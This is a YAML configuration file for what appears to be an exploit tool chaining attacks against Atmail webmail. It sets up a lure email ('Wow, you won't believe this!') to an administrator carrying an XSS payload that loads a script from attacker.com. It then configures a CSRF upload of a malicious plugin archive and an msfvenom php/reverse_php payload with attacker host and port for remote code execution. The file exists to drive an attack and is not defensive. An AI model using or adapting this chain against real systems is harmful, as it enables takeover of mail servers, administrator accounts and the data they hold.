xss:
  from_addr: 'attacker@example.org' # attacker email
  to_addr: 'admin@example.org' # admin email
  smtp_srv: 'example.org' # Atmail SMTP server
  smtp_port: 25 # SMTP port
  from_name: 'Attacker' # displayed name of the emitter
  to_name: 'Admin' # displayed name of the recipient
  subject: "Wow, you won't believe this!" # email subject
  body: 'Have a nice day!' # email body
  payload: '<script src="http://attacker.com:8000/csrf_plugin.js"></script>' # XSS payload: remote loader

csrf:
  filename: 'norajPlugin.tgz' # plugin archive filename
  protocol: 'http' # http or https
  host: 'example.org' # Atmail domain or IP
  root: '' # root path with a leading slash, eg. 'atail/'
  wait: 5 # number of second to wait for plugin upload

rce:
  payload: 'php/reverse_php' # msfvenom php payload: msfvenom -l payloads | grep php
  lhost: '1.1.1.1' # attacker public IP address
  lport: 8080
  output: 'norajPlugin.tgz' # plugin archive filename